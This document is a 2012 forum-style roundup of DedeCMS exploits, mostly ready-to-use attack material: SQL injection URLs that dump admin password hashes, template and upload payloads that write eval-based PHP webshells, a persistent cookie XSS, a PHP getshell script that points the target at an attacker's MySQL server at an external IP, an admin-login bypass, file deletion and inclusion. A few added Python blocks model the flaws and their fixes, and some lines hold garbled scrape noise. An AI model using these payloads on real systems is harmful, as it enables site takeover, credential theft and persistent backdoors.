
DedeCMS vulnerability roundup

Posted 2012-10-18 10:42:14

Dedecms 5.6 rss.php injection
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
The updatexml() error message returns [uname:hash] for each dede_admin row; MID(pwd,4,16) cuts the stored 20-character value down to the 16-character MD5 form.


DedeCms v5.6 embedded malicious code execution
Register as a member and, when uploading a "software" item, enter the following in the local address field: a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
Once the item is published, viewing or editing it executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This variant writes x.php, a one-line shell whose POST parameter is xiao (eC5waHA decodes to x.php; the second base64 string decodes to <?php eval($_POST[xiao])?>baidu).
Dede 5.6 GBK SQL injection

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';

http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe

http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
(%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7 is the UTF-8 encoding of 涛声依旧; the byte sequence is what matters when the server reads it as GBK.)
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL execution
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
(%23@__ is #@__, DedeCMS's placeholder for the configured table prefix, so the query works whatever prefix the site uses.)

DEDECMS (all versions) gotopage variable XSS
1. Copy the URL below into the browser and open it to trigger the XSS and install the "XSS rootkit". IE8/9 block this kind of URL-borne XSS, so their XSS filter has to be turned off first.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. Whichever of the URLs below is opened afterwards, the XSS fires again: the decoded payload stored itself in a cookie named gotopage with a one-year expiry, and login.php picks that value up again on every visit.

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable-overwrite getshell
#!/usr/bin/php
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com
www.webvul.com
');
echo "\r\n";
if (!isset($argv[3])) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath=/data/cache   aid=2 shellpath=/   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = $argv[3];
$exp  = Getshell($url, $aid, $path);
// Getshell() returns the HTTP status line; "HTTP/1.1 200 OK" puts "OK" at offset 13
if (strpos($exp, "OK") > 12) {
    echo "\nExploit Success \n";
    if ($aid == 1) echo "\nShell:" . $url . "/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "\nShell:" . $url . "/$path/fuck.php\n";
    if ($aid == 3) echo "\nShell:" . $url . "/$path/plus/fuck.php\n";
} else {
    echo "\nExploit Failed \n";
}

function Getshell($url, $aid, $path)
{
    $id   = $aid;
    $host = $url;
    $port = "80";
    // The _COOKIE[GLOBALS][cfg_db*] fields overwrite the site's DB settings, so mytag_js.php
    // connects to the attacker's MySQL server (184.105.174.114, user exploit, password 90sec
    // in the original) and renders the {dede:php} tag stored there under the given aid.
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=" . $id . " HTTP/1.1\r\n";
    $data .= "Host: " . $host . "\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: " . strlen($content) . "\r\n\r\n";
    $data .= $content . "\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "\nNo response from " . $host . "\n";
        return '';
    }
    fwrite($ock, $data);
    // only the first line of the response (the status line) is needed
    $exp = fgets($ock, 1024);
    fclose($ock);
    return $exp;
}
?>

- z  K7 g% ]* b% q% Y! J, }DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
- Q3 l, @+ S* {" `5 k
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
+ e! X3 B3 a( s9 o" b% d, l/ i; G9 e- d2 }5 D( r0 _! [

6 m% ~- j3 s9 _把上面validate=dcug改为当前的验证码,即可直接进入网站后台/ r+ P% Z+ X+ E5 c
( D* S; n7 r* B5 u
: [! ~0 N1 X6 S! q4 I9 C. W- @
此漏洞的前提是必须得到后台路径才能实现2 g" |5 S/ |7 N8 z0 {4 }7 Z% d3 K
Dedecms (织梦) tag remote file write
Prerequisite: prepare your own dede database and insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
(The string passed to fwrite is empty as posted; put the shell body there.)

Then submit the form below; the shell lands in 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
// copy the target URL from the doaction field into the form action before submitting
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution
1. Register a user, open the member area, publish an article and upload an image. Then, in attachment management, replace the image with a crafted template. Say the image is named:
uploads/userup/2/12OMX04-15A.jpg

Template content (prefix it with gif89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and build a form like the following; the templet and dede_addonfields fields are the crafted part:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>

<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma-separated)

<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)

<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)

<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(crafted here)
</div>

<!-- form action area -->
<h3 class="meTitle">Body</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value='<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>' style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>

</div>

</form>

Submit; if it reports success, the template path has been changed.
3. Open the modified article. Assuming its aid is 2, visit:

http://127.0.0.1/dede/plus/view.php?aid=2
This writes the webshell 1.php into the plus directory.
DEDECMS Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >Change</button>
</form>

Build the form above and upload; the image is saved as /uploads/userup/3/1.gif.
Publish an article, then build the edit form below (templet points at the uploaded gif):

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>

Dedecms V5.6 remote file deletion

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
The oldface value starts with the member's own upload directory, and the ../ segments then walk out of it, so the unlink hits a file elsewhere under the web root.
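
The oldface path above and the template trick earlier in this post (templet=../uploads/userup/3/1.gif, which makes the engine render an uploaded "image" through runphp tags) are the same mistake in two directions: a path that is checked as a string but used after the filesystem resolves the ../ segments. The block below is an added example in Python, not code from this post or from DedeCMS; it models both checks under an assumed web root of /www and an assumed template directory /www/templets, and shows the prefix-only check beside a normalise-then-contain check.

```python
import posixpath

WEBROOT = '/www'                      # assumed install directory
TEMPLETS_DIR = WEBROOT + '/templets'  # assumed template directory


def is_contained(base_dir, target):
    """True if the normalised target is base_dir itself or lives under it.
    The trailing '/' stops /uploads/userup/80 from passing as /uploads/userup/8."""
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(target)
    return target == base or target.startswith(base + '/')


def vulnerable_delete_target(uid, oldface):
    """Prefix-only check: oldface must start with the member's own upload directory.
    Returns the path unlink() would really remove, or None if the check rejects it."""
    if not oldface.startswith('/uploads/userup/%d/' % uid):
        return None
    # the string passed, but the kernel resolves '..' before unlinking
    return posixpath.normpath(WEBROOT + oldface)


def hardened_delete_target(uid, oldface):
    """Normalise first, then require the result to stay inside the member's directory."""
    target = posixpath.normpath(posixpath.join(WEBROOT, oldface.lstrip('/')))
    member_dir = '%s/uploads/userup/%d' % (WEBROOT, uid)
    return target if is_contained(member_dir, target) else None


def vulnerable_template_path(templet):
    """What the engine ends up reading when the templet field is used as-is."""
    return posixpath.normpath(posixpath.join(TEMPLETS_DIR, templet))


def hardened_template_path(templet):
    """Accept only .htm files that normalise to somewhere under the template directory."""
    target = posixpath.normpath(posixpath.join(TEMPLETS_DIR, templet))
    if not is_contained(TEMPLETS_DIR, target) or not target.endswith('.htm'):
        return None
    return target


if __name__ == '__main__':
    payload = '/uploads/userup/8/../../../member/templets/images/m_logo.gif'
    print(vulnerable_delete_target(8, payload))      # /www/member/templets/images/m_logo.gif
    print(hardened_delete_target(8, payload))        # None
    print(vulnerable_template_path('../uploads/userup/3/1.gif'))  # /www/uploads/userup/3/1.gif
    print(hardened_template_path('../uploads/userup/3/1.gif'))    # None
```

posixpath.normpath only rewrites the string, which is enough to show the two checks side by side; on a real server resolve with os.path.realpath as well, so a symlink inside the allowed directory cannot point back out of it.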

Dedecms V5.6 plus/carbuyaction.php local file inclusion

http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL execution
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The pwd column is not a full MD5: DedeCMS stores the 32-character MD5 with the first 5 and last 7 characters removed, a 20-character string. Dropping 3 more from the front and 1 from the end of that gives the common 16-character MD5 form (characters 9 to 24 of the full hash).
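
The relationship between the three forms is easy to get wrong, and it also explains the MID(pwd,4,16) in the rss.php payload at the top of this post: MySQL's MID is 1-based, so it takes characters 4 to 19 of the stored 20-character value, which is exactly the 16-character MD5. The following is an added example in Python, not code from this post or from DedeCMS; the password and the dumped values are constructed.

```python
import hashlib


def md5_hex(password):
    return hashlib.md5(password.encode('utf-8')).hexdigest()


def dede_stored_pwd(password):
    """What DedeCMS writes to dede_admin.pwd: the 32-char MD5 minus its first 5 and
    last 7 characters, i.e. characters 6-25 of the hash (20 chars)."""
    return md5_hex(password)[5:25]


def md5_16(password):
    """The common 16-char MD5 form: characters 9-24 of the full hash."""
    return md5_hex(password)[8:24]


def stored_to_md5_16(stored):
    """Drop 3 from the front and 1 from the end of a dumped 20-char pwd value.
    This is what MID(pwd,4,16) in the rss.php payload does on the server
    (MID is 1-based, so position 4 is Python index 3)."""
    if len(stored) != 20:
        raise ValueError('dede_admin.pwd values are 20 characters')
    return stored[3:19]


def check_candidate(candidate, dumped):
    """Test a candidate password against a dumped value in either form."""
    if len(dumped) == 20:
        return dede_stored_pwd(candidate) == dumped
    if len(dumped) == 16:
        return md5_16(candidate) == dumped
    raise ValueError('expected a 20- or 16-character hash')


if __name__ == '__main__':
    # constructed example: the account password is "admin"
    stored = dede_stored_pwd('admin')
    print(stored, stored_to_md5_16(stored), md5_16('admin'))
```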
Dedecms 5.1 feedback_js.php injection
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

Dedecms select_soft_post.php uninitialized variable (register_globals)
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
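
The mytag_js.php exploits, the login.php bypass and the PHP script earlier in this post all abuse one mechanism: DedeCMS registers every request key as a global variable, and the pre-fix name check only looked at top-level key names, so a key named _COO KIE (or _POST) in one request source replaced that superglobal before the loop's next pass registered its contents, including a GLOBALS array carrying cfg_db* overrides. The form just above gets the same cfg_* overwrite from PHP's own register_globals instead. The block below is an added example in Python, not code from this post or from DedeCMS; it models the registration loop from include/common.inc.php with the pre-fix and fixed name checks as assumed here (pre-fix: ^(cfg_|GLOBALS) on top-level keys only; fixed: ^(cfg_|GLOBALS|_GET|_POST|_COOKIE) at every nesting level), uses constructed site-config values, and feeds it the request strings from this post.

```python
import re
from urllib.parse import parse_qsl

# Assumed shape of the two name checks: the pre-fix one only saw top-level keys,
# the fixed one is applied recursively and also rejects the superglobal names.
OLD_FORBIDDEN = re.compile(r'^(cfg_|GLOBALS)')
NEW_FORBIDDEN = re.compile(r'^(cfg_|GLOBALS|_GET|_POST|_COOKIE)')

# Site config already loaded from data/common.inc.php when the loop runs (constructed values).
SITE_CONFIG = {
    'cfg_dbhost': 'localhost', 'cfg_dbuser': 'dedeuser',
    'cfg_dbpwd': 'secret', 'cfg_dbname': 'dede', 'cfg_dbprefix': 'dede_',
}


def php_parse_str(qs):
    """Parse a query/body string like PHP's parse_str:
    '_COOKIE[GLOBALS][cfg_dbhost]=1.2.3.4' -> {'_COOKIE': {'GLOBALS': {'cfg_dbhost': '1.2.3.4'}}}"""
    out = {}
    for raw_key, value in parse_qsl(qs, keep_blank_values=True):
        m = re.match(r'^([^\[\]]+)((?:\[[^\]]*\])*)$', raw_key)
        if not m:
            continue
        keys = [m.group(1)] + re.findall(r'\[([^\]]*)\]', m.group(2))
        node = out
        for k in keys[:-1]:
            node = node.setdefault(k, {})
        node[keys[-1]] = value
    return out


def check_request(params, hardened):
    """Raise on a forbidden key name. Pre-fix: top level only; fixed: every level."""
    pattern = NEW_FORBIDDEN if hardened else OLD_FORBIDDEN
    for k, v in params.items():
        if pattern.match(str(k)):
            raise PermissionError('Request var not allow!')
        if hardened and isinstance(v, dict):
            check_request(v, True)


def register_request_vars(get, post, cookie, hardened):
    """Model of the loop in include/common.inc.php:
         foreach(Array('_GET','_POST','_COOKIE') as $_request)
             foreach($$_request as $_k => $_v) ${$_k} = $_v;
    'table' stands for the global symbol table; the table after registration is returned."""
    table = dict(SITE_CONFIG)
    table.update({'_GET': dict(get), '_POST': dict(post), '_COOKIE': dict(cookie)})
    for source in ('_GET', '_POST', '_COOKIE'):
        check_request(table[source], hardened)
    for source in ('_GET', '_POST', '_COOKIE'):
        # $$_request is looked up on each pass, so a key named _COOKIE registered during
        # the _POST pass replaces what the _COOKIE pass iterates over.
        for k, v in list(table[source].items()):
            if k == 'GLOBALS' and isinstance(v, dict):
                # ${'GLOBALS'} = array(...): the exploits rely on this landing in the
                # global table, which is what the model does here.
                table.update(v)
            else:
                table[k] = v
    return table


def effective_dbhost(get_qs, post_qs, hardened):
    """cfg_dbhost the DB layer would read after registration, or the rejection message."""
    try:
        table = register_request_vars(php_parse_str(get_qs), php_parse_str(post_qs),
                                      {'PHPSESSID': 'abc'}, hardened)
    except PermissionError as e:
        return str(e)
    return table['cfg_dbhost']


# the mytag_js.php POST body and the login.php query string from this post
MYTAG_BODY = ('doaction=http%3A%2F%2Fwww.test.com%2Fplus%2Fmytag_js.php%3Faid%3D1'
              '&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114'
              '&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec'
              '&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_'
              '&nocache=true')
LOGIN_QUERY = ('dopost=login&validate=dcug&userid=admin&pwd=inimda'
               '&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root')

if __name__ == '__main__':
    print(effective_dbhost('', MYTAG_BODY, hardened=False))    # 184.105.174.114
    print(effective_dbhost('', MYTAG_BODY, hardened=True))     # Request var not allow!
    print(effective_dbhost(LOGIN_QUERY, '', hardened=False))   # 116.255.183.90
```

The model makes the failure visible without a PHP install: the name check rejects cfg_dbhost=... directly, but lets _COOKIE[GLOBALS][cfg_dbhost] through because it never descends into the array, and the loop then does the rest. Checking every nesting level and refusing the superglobal names as keys is the shape of the fix; not registering request data as globals at all is the real cure.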

Dedecms 5.3 - 5.5 plus/digg_frame.php injection
Exploits a MySQL numeric overflow error together with the fact that DedeCMS records database errors in a PHP file (data/mysql_error_trace.php) without checking what follows the file header.
1. Visit:

http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed. (1024%651024 is 1024e1024, a double too large for MySQL to parse, which forces the logged error; the mid value opens with */ to close the comment the log file wraps the SQL in, so the rest of the line is live PHP.)

2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following confirms the injection worked (int(3) is the output of the injected var_dump(3)):
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Open test.html from dede.rar; note that the form's action address is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

Press OK; seeing the step-2 output again means the trojan has been written.
Dedecms plus/infosearch.php injection
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
(%cf is the lead byte of a two-byte GBK character; the backslash that addslashes puts in front of the quote becomes its trail byte, which leaves the quote unescaped.)